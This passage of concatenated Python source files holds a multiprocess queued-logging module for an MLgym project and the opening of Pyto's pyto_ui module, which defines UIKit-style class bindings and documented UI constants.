def log(self, level: LogLevel, message: str):
raise NotImplementedError
class ConsoleLogger(MLgymLoggerIF):
def __init__(self, logger_id: str):
super().__init__(logger_id)
self.logger = ConsoleLogger._get_console_logger(logger_id)
def log(self, level: LogLevel, message: str):
self.logger.log(level.value, message)
@staticmethod
def _get_console_logger(logger_id: str):
# create / get logger
logger = logging.getLogger(logger_id)
# if logger has not been created
if not logger.hasHandlers():
logger.setLevel(logging.DEBUG)
# create console handler logging at DEBUG level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
return logger
class QLogger(MLgymLoggerIF):
def __init__(self, logger_id: str, queue: Queue):
super().__init__(logger_id)
self.queue = queue
def log(self, level: LogLevel, message: str):
message = self.build_message(level, message)
self.queue.put(message)
class QueuedLogging:
_instance: "QueuedLogging" = None
@classmethod
def start_logging(cls, log_msg_queue: Queue, log_dir_path: str):
if cls._instance is None:
cls._instance = QueuedLogging(log_msg_queue, log_dir_path)
cls._instance._start_listening()
else:
raise SingletonAlreadyInstantiatedError()
@staticmethod
def get_qlogger(logger_id: str) -> QLogger:
return QLogger(logger_id, QueuedLogging._instance.log_msg_queue)
def __init__(self, log_msg_queue: Queue, log_dir_path: str):
if self._instance is not None:
raise SingletonAlreadyInstantiatedError()
self.log_msg_queue = log_msg_queue
self.log_dir_path = log_dir_path
self.listener_process = None
def _start_listening(self):
self.listener_process = Process(target=QueuedLogging._listener_process, args=(self.log_msg_queue, self.log_dir_path))
self.listener_process.start()
@staticmethod
def stop_listener():
QueuedLogging._instance.log_msg_queue.put_nowait(None)
@staticmethod
def _get_logger(log_dir_path: str, logger_id: str):
logger = logging.getLogger(logger_id)
log_file_path = os.path.join(log_dir_path, f"{logger_id}.log")
os.makedirs(os.path.dirname(log_file_path), exist_ok=True)
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler(log_file_path)
fh.setLevel(logging.DEBUG)
# create console handler, also at DEBUG level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
return logger
@staticmethod
def _listener_process(queue: Queue, log_dir_path: str):
loggers = {}
while True:
try:
message: Message = queue.get()
if message is None: # We send this as a sentinel to tell the listener to quit.
break
if message.logger_id not in loggers:
loggers[message.logger_id] = QueuedLogging._get_logger(log_dir_path, message.logger_id)
loggers[message.logger_id].log(level=message.level.value, msg=message.message_string)
except Exception:
print('Whoops! Problem:', file=sys.stderr)
traceback.print_exc(file=sys.stderr)
def get_console_logger(name: str):
# create / get a logger with the given name
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# create console handler logging at DEBUG level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
return logger
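# A minimal usage sketch (the path and logger id are illustrative):
#
#   from multiprocessing import Queue
#
#   queue = Queue()
#   QueuedLogging.start_logging(queue, "/tmp/logs")  # spawns the listener process
#   logger = QueuedLogging.get_qlogger("worker_1")   # QLogger bound to the queue
#   logger.log(LogLevel.INFO, "training started")    # enqueues a Message
#   QueuedLogging.stop_listener()                    # None sentinel stops the listener
#
# The listener routes each Message by logger_id to its own file under
# log_dir_path ("worker_1.log" here), so worker processes never share
# a logging handler across process boundaries.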
|
pyto_ui.py
|
"""
UI for scripts
The ``pyto_ui`` module contains classes for building and presenting a native UI, in app or in the Today Widget.
This library's API is very similar to UIKit.
This library has many similarities with ``UIKit``, but subclassing isn't supported very well. Instead of overriding methods, you will often need to set a property to a function. Setters are what make a passed value take effect, so rather than overriding a getter you should just set the property. If you really want to subclass a :class:`View`, you can set the properties from the initializer.
(Many docstrings are quoted from the Apple Documentation)
"""
from __future__ import annotations
from UIKit import UIFont as __UIFont__, UIImage, UIView, UIViewController
from Foundation import NSThread, NSURL
from typing import List, Callable, Tuple
from pyto import __Class__, ConsoleViewController, PyAlert as __PyAlert__
from __check_type__ import check
from __image__ import __ui_image_from_pil_image__, __pil_image_from_ui_image__
from time import sleep
from io import BytesIO
from threading import Thread
from mainthread import mainthread
from inspect import signature
import __pyto_ui_garbage_collector__ as _gc
import os
import sys
import base64
import threading
import _values
import ui_constants
import builtins
import json
import warnings
import re
from timeit import default_timer as timer
try:
from rubicon.objc import ObjCClass, CGFloat
from rubicon.objc.api import NSString
except ValueError:
def ObjCClass(class_name):
return None
if "widget" not in os.environ:
from urllib.request import urlopen
try:
from PIL import Image
except ImportError:
pass
if "sphinx" not in sys.modules:
from toga_iOS.widgets.box import Box as iOSBox
from toga_iOS.colors import native_color
import toga
class __v__:
def __init__(self, string):
self.s = string
def __eq__(self, other):
return other == self.s
def __repr__(self):
return self.s
#############################
# MARK: - Objective-C Classes
#############################
__PyView__ = __Class__("PyView")
__PyScrollView__ = __Class__("PyScrollView")
__PyControl__ = __Class__("PyControl")
__PyStackView__ = __Class__("PyStackView")
__PyStackSpacerView__ = __Class__("PyStackSpacerView")
__PySlider__ = __Class__("PySlider")
__PySegmentedControl__ = __Class__("PySegmentedControl")
__PySwitch__ = __Class__("PySwitch")
__PyButton__ = __Class__("PyButton")
__PyLabel__ = __Class__("PyLabel")
__UIImageView__ = __Class__("PyImageView")
__PyTextView__ = __Class__("PyTextView")
__PyTextField__ = __Class__("PyTextField")
__PyTableView__ = __Class__("PyTableView")
__PyTableViewCell__ = __Class__("PyTableViewCell")
__PyTableViewSection__ = __Class__("PyTableViewSection")
__PyWebView__ = __Class__("PyWebView")
__PyGestureRecognizer__ = __Class__("PyGestureRecognizer")
__PyUIKitView__ = __Class__("PyUIKitView")
__PyColor__ = __Class__("PyColor")
__PyButtonItem__ = __Class__("PyButtonItem")
__PyTextInputTraitsConstants__ = __Class__("PyTextInputTraitsConstants")
try:
__NSData__ = ObjCClass("NSData")
except NameError:
pass
###################
# MARK: - Constants
###################
# MARK: - Gesture Recognizer Type
GESTURE_TYPE = ui_constants.GESTURE_TYPE
GESTURE_TYPE_LONG_PRESS = ui_constants.GESTURE_TYPE_LONG_PRESS
"""
A long press gesture.
"""
GESTURE_TYPE_PAN = ui_constants.GESTURE_TYPE_PAN
"""
A dragging gesture.
"""
GESTURE_TYPE_TAP = ui_constants.GESTURE_TYPE_TAP
"""
A tap gesture.
"""
# MARK: - Keyboard Appearance
KEYBOARD_APPEARANCE = ui_constants.KEYBOARD_APPEARANCE
KEYBOARD_APPEARANCE_DEFAULT = ui_constants.KEYBOARD_APPEARANCE_DEFAULT
"""
Specifies the default keyboard appearance for the current input method.
"""
KEYBOARD_APPEARANCE_LIGHT = ui_constants.KEYBOARD_APPEARANCE_LIGHT
"""
Specifies a keyboard appearance suitable for a light UI look.
"""
KEYBOARD_APPEARANCE_DARK = ui_constants.KEYBOARD_APPEARANCE_DARK
"""
Specifies a keyboard appearance suitable for a dark UI look.
"""
# MARK: - Keyboard Type
KEYBOARD_TYPE = ui_constants.KEYBOARD_TYPE
KEYBOARD_TYPE_DEFAULT = ui_constants.KEYBOARD_TYPE_DEFAULT
"""
Specifies the default keyboard for the current input method.
"""
KEYBOARD_TYPE_ASCII_CAPABLE = ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE
"""
Specifies a keyboard that displays standard ASCII characters.
"""
KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD = (
ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD
)
"""
Specifies a number pad that outputs only ASCII digits.
"""
KEYBOARD_TYPE_DECIMAL_PAD = ui_constants.KEYBOARD_TYPE_DECIMAL_PAD
"""
Specifies a keyboard with numbers and a decimal point.
"""
KEYBOARD_TYPE_EMAIL_ADDRESS = ui_constants.KEYBOARD_TYPE_EMAIL_ADDRESS
"""
Specifies a keyboard optimized for entering email addresses. This keyboard type prominently features the at (“@”), period (“.”) and space characters.
"""
KEYBOARD_TYPE_NAME_PHONE_PAD = ui_constants.KEYBOARD_TYPE_NAME_PHONE_PAD
"""
Specifies a keypad designed for entering a person’s name or phone number. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBER_PAD = ui_constants.KEYBOARD_TYPE_NUMBER_PAD
"""
Specifies a numeric keypad designed for PIN entry. This keyboard type prominently features the numbers 0 through 9. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION = (
ui_constants.KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION
)
"""
Specifies the numbers and punctuation keyboard.
"""
KEYBOARD_TYPE_PHONE_PAD = ui_constants.KEYBOARD_TYPE_PHONE_PAD
"""
Specifies a keypad designed for entering telephone numbers. This keyboard type prominently features the numbers 0 through 9 and the “*” and “#” characters. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_TWITTER = ui_constants.KEYBOARD_TYPE_TWITTER
"""
Specifies a keyboard optimized for Twitter text entry, with easy access to the at (“@”) and hash (“#”) characters.
"""
KEYBOARD_TYPE_URL = ui_constants.KEYBOARD_TYPE_URL
"""
Specifies a keyboard optimized for URL entry. This keyboard type prominently features the period (“.”) and slash (“/”) characters and the “.com” string.
"""
KEYBOARD_TYPE_WEB_SEARCH = ui_constants.KEYBOARD_TYPE_WEB_SEARCH
"""
Specifies a keyboard optimized for web search terms and URL entry. This keyboard type prominently features the space and period (“.”) characters.
"""
# MARK: - Return Key Type
RETURN_KEY_TYPE = ui_constants.RETURN_KEY_TYPE
RETURN_KEY_TYPE_DEFAULT = ui_constants.RETURN_KEY_TYPE_DEFAULT
"""
Specifies that the visible title of the Return key is “return”.
"""
RETURN_KEY_TYPE_CONTINUE = ui_constants.RETURN_KEY_TYPE_CONTINUE
"""
Specifies that the visible title of the Return key is “Continue”.
"""
RETURN_KEY_TYPE_DONE = ui_constants.RETURN_KEY_TYPE_DONE
"""
Specifies that the visible title of the Return key is “Done”.
"""
RETURN_KEY_TYPE_EMERGENCY_CALL = ui_constants.RETURN_KEY_TYPE_EMERGENCY_CALL
"""
Specifies that the visible title of the Return key is “Emergency Call”.
"""
RETURN_KEY_TYPE_GO = ui_constants.RETURN_KEY_TYPE_GO
"""
Specifies that the visible title of the Return key is “Go”.
"""
RETURN_KEY_TYPE_GOOGLE = ui_constants.RETURN_KEY_TYPE_GOOGLE
"""
Specifies that the visible title of the Return key is “Google”.
"""
RETURN_KEY_TYPE_JOIN = ui_constants.RETURN_KEY_TYPE_JOIN
"""
Specifies that the visible title of the Return key is “Join”.
"""
RETURN_KEY_TYPE_NEXT = ui_constants.RETURN_KEY_TYPE_NEXT
"""
Specifies that the visible title of the Return key is “Next”.
"""
RETURN_KEY_TYPE_ROUTE = ui_constants.RETURN_KEY_TYPE_ROUTE
"""
Specifies that the visible title of the Return key is “Route”.
"""
RETURN_KEY_TYPE_SEARCH = ui_constants.RETURN_KEY_TYPE_SEARCH
"""
Specifies that the visible title of the Return key is “Search”.
"""
RETURN_KEY_TYPE_SEND = ui_constants.RETURN_KEY_TYPE_SEND
"""
Specifies that the visible title of the Return key is “Send”.
"""
RETURN_KEY_TYPE_YAHOO = ui_constants.RETURN_KEY_TYPE_YAHOO
"""
Specifies that the visible title of the Return key is “Yahoo”.
"""
# MARK: - Autocapitalization Type
AUTO_CAPITALIZE = ui_constants.AUTO_CAPITALIZE
AUTO_CAPITALIZE_NONE = ui_constants.AUTO_CAPITALIZE_NONE
"""
Specifies that there is no automatic text capitalization.
"""
AUTO_CAPITALIZE_ALL = ui_constants.AUTO_CAPITALIZE_ALL
"""
Specifies automatic capitalization of all characters, such as for entry of two-character state abbreviations for the United States.
"""
AUTO_CAPITALIZE_SENTENCES = ui_constants.AUTO_CAPITALIZE_SENTENCES
"""
Specifies automatic capitalization of the first letter of each sentence.
"""
AUTO_CAPITALIZE_WORDS = ui_constants.AUTO_CAPITALIZE_WORDS
"""
Specifies automatic capitalization of the first letter of each word.
"""
# MARK: - Font Text Style
FONT_TEXT_STYLE = ui_constants.FONT_TEXT_STYLE
FONT_TEXT_STYLE_BODY = ui_constants.FONT_TEXT_STYLE_BODY
"""
The font used for body text.
"""
FONT_TEXT_STYLE_CALLOUT = ui_constants.FONT_TEXT_STYLE_CALLOUT
"""
The font used for callouts.
"""
FONT_TEXT_STYLE_CAPTION_1 = ui_constants.FONT_TEXT_STYLE_CAPTION_1
"""
The font used for standard captions.
"""
FONT_TEXT_STYLE_CAPTION_2 = ui_constants.FONT_TEXT_STYLE_CAPTION_2
"""
The font used for alternate captions.
"""
FONT_TEXT_STYLE_FOOTNOTE = ui_constants.FONT_TEXT_STYLE_FOOTNOTE
"""
The font used in footnotes.
"""
FONT_TEXT_STYLE_HEADLINE = ui_constants.FONT_TEXT_STYLE_HEADLINE
"""
The font used for headings.
"""
FONT_TEXT_STYLE_SUBHEADLINE = ui_constants.FONT_TEXT_STYLE_SUBHEADLINE
"""
The font used for subheadings.
"""
FONT_TEXT_STYLE_LARGE_TITLE = ui_constants.FONT_TEXT_STYLE_LARGE_TITLE
"""
The font style for large titles.
"""
FONT_TEXT_STYLE_TITLE_1 = ui_constants.FONT_TEXT_STYLE_TITLE_1
"""
The font used for first level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_2 = ui_constants.FONT_TEXT_STYLE_TITLE_2
"""
The font used for second level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_3 = ui_constants.FONT_TEXT_STYLE_TITLE_3
"""
The font used for third level hierarchical headings.
"""
# MARK: - Font Size
FONT_SIZE = ui_constants.FONT_SIZE
FONT_LABEL_SIZE = ui_constants.FONT_LABEL_SIZE
"""
Returns the standard font size used for labels.
"""
FONT_BUTTON_SIZE = ui_constants.FONT_BUTTON_SIZE
"""
Returns the standard font size used for buttons.
"""
FONT_SMALL_SYSTEM_SIZE = ui_constants.FONT_SMALL_SYSTEM_SIZE
"""
Returns the size of the standard small system font.
"""
FONT_SYSTEM_SIZE = ui_constants.FONT_SYSTEM_SIZE
"""
Returns the size of the standard system font.
"""
# MARK: - Presentation Mode
PRESENTATION_MODE = ui_constants.PRESENTATION_MODE
PRESENTATION_MODE_SHEET = ui_constants.PRESENTATION_MODE_SHEET
"""
A presentation style that displays the content centered in the screen.
"""
PRESENTATION_MODE_FULLSCREEN = ui_constants.PRESENTATION_MODE_FULLSCREEN
"""
A presentation style in which the presented view covers the screen.
"""
PRESENTATION_MODE_WIDGET = ui_constants.PRESENTATION_MODE_WIDGET
"""
A presentation mode style which simulates a Today Widget. Should be used in app to preview how a widget will look.
"""
# MARK: - Appearance
APPEARANCE = ui_constants.APPEARANCE
APPEARANCE_UNSPECIFIED = ui_constants.APPEARANCE_UNSPECIFIED
"""
An unspecified interface style.
"""
APPEARANCE_LIGHT = ui_constants.APPEARANCE_LIGHT
"""
The light interface style.
"""
APPEARANCE_DARK = ui_constants.APPEARANCE_DARK
"""
The dark interface style.
"""
# MARK: - Auto Resizing
AUTO_RESIZING = ui_constants.AUTO_RESIZING
FLEXIBLE_WIDTH = ui_constants.FLEXIBLE_WIDTH
"""
Resizing performed by expanding or shrinking a view’s width.
"""
FLEXIBLE_HEIGHT = ui_constants.FLEXIBLE_HEIGHT
"""
Resizing performed by expanding or shrinking a view's height.
"""
FLEXIBLE_TOP_MARGIN = ui_constants.FLEXIBLE_TOP_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the top margin.
"""
FLEXIBLE_BOTTOM_MARGIN = ui_constants.FLEXIBLE_BOTTOM_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the bottom margin.
"""
FLEXIBLE_LEFT_MARGIN = ui_constants.FLEXIBLE_LEFT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the left margin.
"""
FLEXIBLE_RIGHT_MARGIN = ui_constants.FLEXIBLE_RIGHT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the right margin.
"""
# MARK: - Content Mode
CONTENT_MODE = ui_constants.CONTENT_MODE
CONTENT_MODE_SCALE_TO_FILL = ui_constants.CONTENT_MODE_SCALE_TO_FILL
"""
The option to scale the content to fit the size of itself by changing the aspect ratio of the content if necessary.
"""
CONTENT_MODE_SCALE_ASPECT_FIT = ui_constants.CONTENT_MODE_SCALE_ASPECT_FIT
"""
The option to scale the content to fit the size of the view by maintaining the aspect ratio. Any remaining area of the view’s bounds is transparent.
"""
CONTENT_MODE_SCALE_ASPECT_FILL = ui_constants.CONTENT_MODE_SCALE_ASPECT_FILL
"""
The option to scale the content to fill the size of the view. Some portion of the content may be clipped to fill the view’s bounds.
"""
CONTENT_MODE_REDRAW = ui_constants.CONTENT_MODE_REDRAW
"""
The option to redisplay the view when the bounds change by invoking the ``setNeedsDisplay()`` method.
"""
CONTENT_MODE_CENTER = ui_constants.CONTENT_MODE_CENTER
"""
The option to center the content in the view’s bounds, keeping the proportions the same.
"""
CONTENT_MODE_TOP = ui_constants.CONTENT_MODE_TOP
"""
The option to center the content aligned at the top in the view’s bounds.
"""
CONTENT_MODE_BOTTOM = ui_constants.CONTENT_MODE_BOTTOM
"""
The option to center the content aligned at the bottom in the view’s bounds.
"""
CONTENT_MODE_LEFT = ui_constants.CONTENT_MODE_LEFT
"""
The option to align the content on the left of the view.
"""
CONTENT_MODE_RIGHT = ui_constants.CONTENT_MODE_RIGHT
"""
The option to align the content on the right of the view.
"""
CONTENT_MODE_TOP_LEFT = ui_constants.CONTENT_MODE_TOP_LEFT
"""
The option to align the content in the top-left corner of the view.
"""
CONTENT_MODE_TOP_RIGHT = ui_constants.CONTENT_MODE_TOP_RIGHT
"""
The option to align the content in the top-right corner of the view.
"""
CONTENT_MODE_BOTTOM_LEFT = ui_constants.CONTENT_MODE_BOTTOM_LEFT
"""
The option to align the content in the bottom-left corner of the view.
"""
CONTENT_MODE_BOTTOM_RIGHT = ui_constants.CONTENT_MODE_BOTTOM_RIGHT
"""
The option to align the content in the bottom-right corner of the view.
"""
# MARK: - Horizontal Alignment
HORIZONTAL_ALIGNMENT = ui_constants.HORIZONTAL_ALIGNMENT
HORIZONTAL_ALIGNMENT_CENTER = ui_constants.HORIZONTAL_ALIGNMENT_CENTER
"""
Aligns the content horizontally in the center of the control.
"""
HORIZONTAL_ALIGNMENT_FILL = ui_constants.HORIZONTAL_ALIGNMENT_FILL
"""
Aligns the content horizontally to fill the content rectangles; text may wrap and images may be stretched.
"""
HORIZONTAL_ALIGNMENT_LEADING = ui_constants.HORIZONTAL_ALIGNMENT_LEADING
"""
Aligns the content horizontally from the leading edge of the control.
"""
HORIZONTAL_ALIGNMENT_LEFT = ui_constants.HORIZONTAL_ALIGNMENT_LEFT
"""
Aligns the content horizontally from the left of the control (the default).
"""
HORIZONTAL_ALIGNMENT_RIGHT = ui_constants.HORIZONTAL_ALIGNMENT_RIGHT
"""
Aligns the content horizontally from the right of the control.
"""
HORIZONTAL_ALIGNMENT_TRAILING = ui_constants.HORIZONTAL_ALIGNMENT_TRAILING
"""
Aligns the content horizontally from the trailing edge of the control.
"""
# MARK: - Vertical Alignment
VERTICAL_ALIGNMENT = ui_constants.VERTICAL_ALIGNMENT
VERTICAL_ALIGNMENT_BOTTOM = ui_constants.VERTICAL_ALIGNMENT_BOTTOM
"""
Aligns the content vertically at the bottom in the control.
"""
VERTICAL_ALIGNMENT_CENTER = ui_constants.VERTICAL_ALIGNMENT_CENTER
"""
Aligns the content vertically in the center of the control.
"""
VERTICAL_ALIGNMENT_FILL = ui_constants.VERTICAL_ALIGNMENT_FILL
"""
Aligns the content vertically to fill the content rectangle; images may be stretched.
"""
VERTICAL_ALIGNMENT_TOP = ui_constants.VERTICAL_ALIGNMENT_TOP
"""
Aligns the content vertically at the top in the control (the default).
"""
# MARK: - Button Type
BUTTON_TYPE = ui_constants.BUTTON_TYPE
BUTTON_TYPE_SYSTEM = ui_constants.BUTTON_TYPE_SYSTEM
"""
A system style button, such as those shown in navigation bars and toolbars.
"""
BUTTON_TYPE_CONTACT_ADD = ui_constants.BUTTON_TYPE_CONTACT_ADD
"""
A contact add button.
"""
BUTTON_TYPE_CUSTOM = ui_constants.BUTTON_TYPE_CUSTOM
"""
No button style.
"""
BUTTON_TYPE_DETAIL_DISCLOSURE = ui_constants.BUTTON_TYPE_DETAIL_DISCLOSURE
"""
A detail disclosure button.
"""
BUTTON_TYPE_INFO_DARK = ui_constants.BUTTON_TYPE_INFO_DARK
"""
An information button that has a dark background.
"""
BUTTON_TYPE_INFO_LIGHT = ui_constants.BUTTON_TYPE_INFO_LIGHT
"""
An information button that has a light background.
"""
# MARK: - Text Alignment
TEXT_ALIGNMENT = ui_constants.TEXT_ALIGNMENT
TEXT_ALIGNMENT_LEFT = ui_constants.TEXT_ALIGNMENT_LEFT
"""
Text is visually left aligned.
"""
TEXT_ALIGNMENT_RIGHT = ui_constants.TEXT_ALIGNMENT_RIGHT
"""
Text is visually right aligned.
"""
TEXT_ALIGNMENT_CENTER = ui_constants.TEXT_ALIGNMENT_CENTER
"""
Text is visually center aligned.
"""
TEXT_ALIGNMENT_JUSTIFIED = ui_constants.TEXT_ALIGNMENT_JUSTIFIED
"""
Text is justified.
"""
TEXT_ALIGNMENT_NATURAL = ui_constants.TEXT_ALIGNMENT_NATURAL
"""
Use the default alignment associated with the current localization of the app. The default alignment for left-to-right scripts is left, and the default alignment for right-to-left scripts is right.
"""
# MARK: - Line Break Mode
LINE_BREAK_MODE = ui_constants.LINE_BREAK_MODE
LINE_BREAK_MODE_BY_WORD_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_WORD_WRAPPING
"""
Wrapping occurs at word boundaries, unless the word itself doesn’t fit on a single line.
"""
LINE_BREAK_MODE_BY_CHAR_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_CHAR_WRAPPING
"""
Wrapping occurs before the first character that doesn’t fit.
"""
LINE_BREAK_MODE_BY_CLIPPING = ui_constants.LINE_BREAK_MODE_BY_CLIPPING
"""
Lines are simply not drawn past the edge of the text container.
"""
LINE_BREAK_MODE_BY_TRUNCATING_HEAD = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_HEAD
"""
The line is displayed so that the end fits in the container and the missing text at the beginning of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_TAIL = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_TAIL
"""
The line is displayed so that the beginning fits in the container and the missing text at the end of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE
"""
The line is displayed so that the beginning and end fit in the container and the missing text in the middle is indicated by an ellipsis glyph. This mode is used for single-line layout; using it with multiline text truncates the text into a single line.
"""
# MARK: - Touch Type
TOUCH_TYPE = ui_constants.TOUCH_TYPE
TOUCH_TYPE_DIRECT = ui_constants.TOUCH_TYPE_DIRECT
"""
A touch resulting from direct contact with the screen.
"""
TOUCH_TYPE_INDIRECT = ui_constants.TOUCH_TYPE_INDIRECT
"""
A touch that did not result from contact with the screen.
"""
TOUCH_TYPE_PENCIL = ui_constants.TOUCH_TYPE_PENCIL
"""
A touch from Apple Pencil.
"""
# MARK: - Gesture State
GESTURE_STATE = ui_constants.GESTURE_STATE
GESTURE_STATE_POSSIBLE = ui_constants.GESTURE_STATE_POSSIBLE
"""
The gesture recognizer has not yet recognized its gesture, but may be evaluating touch events. This is the default state.
"""
GESTURE_STATE_BEGAN = ui_constants.GESTURE_STATE_BEGAN
"""
The gesture recognizer has received touch objects recognized as a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_CHANGED = ui_constants.GESTURE_STATE_CHANGED
"""
The gesture recognizer has received touches recognized as a change to a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_ENDED = ui_constants.GESTURE_STATE_ENDED
"""
The gesture recognizer has received touches recognized as the end of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_CANCELLED = ui_constants.GESTURE_STATE_CANCELLED
"""
The gesture recognizer has received touches resulting in the cancellation of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_RECOGNIZED = ui_constants.GESTURE_STATE_RECOGNIZED
"""
The gesture recognizer has received a multi-touch sequence that it recognizes as its gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
# MARK: - Table View Cell Style
TABLE_VIEW_CELL_STYLE = ui_constants.TABLE_VIEW_CELL_STYLE
TABLE_VIEW_CELL_STYLE_DEFAULT = ui_constants.TABLE_VIEW_CELL_STYLE_DEFAULT
"""
A simple style for a cell with a text label (black and left-aligned) and an optional image view.
"""
TABLE_VIEW_CELL_STYLE_SUBTITLE = ui_constants.TABLE_VIEW_CELL_STYLE_SUBTITLE
"""
A style for a cell with a left-aligned label across the top and a left-aligned label below it in smaller gray text.
"""
TABLE_VIEW_CELL_STYLE_VALUE1 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE1
"""
A style for a cell with a label on the left side of the cell with left-aligned and black text; on the right side is a label that has smaller blue text and is right-aligned. The Settings application uses cells in this style.
"""
TABLE_VIEW_CELL_STYLE_VALUE2 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE2
"""
A style for a cell with a label on the left side of the cell with text that is right-aligned and blue; on the right side of the cell is another label with smaller text that is left-aligned and black. The Phone/Contacts application uses cells in this style.
"""
# MARK: - Table View Cell Accessory Type
ACCESSORY_TYPE = ui_constants.ACCESSORY_TYPE
ACCESSORY_TYPE_NONE = ui_constants.ACCESSORY_TYPE_NONE
"""
No accessory view.
"""
ACCESSORY_TYPE_CHECKMARK = ui_constants.ACCESSORY_TYPE_CHECKMARK
"""
A checkmark image.
"""
ACCESSORY_TYPE_DETAIL_BUTTON = ui_constants.ACCESSORY_TYPE_DETAIL_BUTTON
"""
An information button.
"""
ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON = (
ui_constants.ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON
)
"""
An information button and a disclosure (chevron) control.
"""
ACCESSORY_TYPE_DISCLOSURE_INDICATOR = ui_constants.ACCESSORY_TYPE_DISCLOSURE_INDICATOR
"""
A chevron-shaped control for presenting new content.
"""
# MARK: - Table View Style
TABLE_VIEW_STYLE = ui_constants.TABLE_VIEW_STYLE
TABLE_VIEW_STYLE_PLAIN = ui_constants.TABLE_VIEW_STYLE_PLAIN
"""
A plain table view.
"""
TABLE_VIEW_STYLE_GROUPED = ui_constants.TABLE_VIEW_STYLE_GROUPED
"""
A table view whose sections present distinct groups of rows.
"""
# MARK: - Text Field Border Style
TEXT_FIELD_BORDER_STYLE = ui_constants.TEXT_FIELD_BORDER_STYLE
TEXT_FIELD_BORDER_STYLE_NONE = ui_constants.TEXT_FIELD_BORDER_STYLE_NONE
"""
The text field does not display a border.
"""
TEXT_FIELD_BORDER_STYLE_BEZEL = ui_constants.TEXT_FIELD_BORDER_STYLE_BEZEL
"""
Displays a bezel-style border for the text field. This style is typically used for standard data-entry fields.
"""
TEXT_FIELD_BORDER_STYLE_LINE = ui_constants.TEXT_FIELD_BORDER_STYLE_LINE
"""
Displays a thin rectangle around the text field.
"""
TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT = ui_constants.TEXT_FIELD_BORDER_STYLE_ROUNDED_RECT
"""
Displays a rounded-style border for the text field.
"""
# MARK: - Button Item Style
BUTTON_ITEM_STYLE = ui_constants.BUTTON_ITEM_STYLE
BUTTON_ITEM_STYLE_PLAIN = ui_constants.BUTTON_ITEM_STYLE_PLAIN
"""
Glows when tapped. The default item style.
"""
BUTTON_ITEM_STYLE_DONE = ui_constants.BUTTON_ITEM_STYLE_DONE
"""
The style for a done button—for example, a button that completes some task and returns to the previous view.
"""
# MARK: - Button Item System Item
SYSTEM_ITEM = ui_constants.SYSTEM_ITEM
SYSTEM_ITEM_ACTION = ui_constants.SYSTEM_ITEM_ACTION
"""
The system action button.
"""
SYSTEM_ITEM_ADD = ui_constants.SYSTEM_ITEM_ADD
"""
The system plus button containing an icon of a plus sign.
"""
SYSTEM_ITEM_BOOKMARKS = ui_constants.SYSTEM_ITEM_BOOKMARKS
"""
The system bookmarks button.
"""
SYSTEM_ITEM_CAMERA = ui_constants.SYSTEM_ITEM_CAMERA
"""
The system camera button.
"""
SYSTEM_ITEM_CANCEL = ui_constants.SYSTEM_ITEM_CANCEL
"""
The system Cancel button, localized.
"""
SYSTEM_ITEM_COMPOSE = ui_constants.SYSTEM_ITEM_COMPOSE
"""
The system compose button.
"""
SYSTEM_ITEM_DONE = ui_constants.SYSTEM_ITEM_DONE
"""
The system Done button, localized.
"""
SYSTEM_ITEM_EDIT = ui_constants.SYSTEM_ITEM_EDIT
"""
The system Edit button, localized.
"""
SYSTEM_ITEM_FAST_FORWARD = ui_constants.SYSTEM_ITEM_FAST_FORWARD
"""
The system fast forward button.
"""
SYSTEM_ITEM_FLEXIBLE_SPACE = ui_constants.SYSTEM_ITEM_FLEXIBLE_SPACE
"""
Blank space to add between other items. The space is distributed equally between the other items. Other item properties are ignored when this value is set.
"""
SYSTEM_ITEM_ORGANIZE = ui_constants.SYSTEM_ITEM_ORGANIZE
"""
The system organize button.
"""
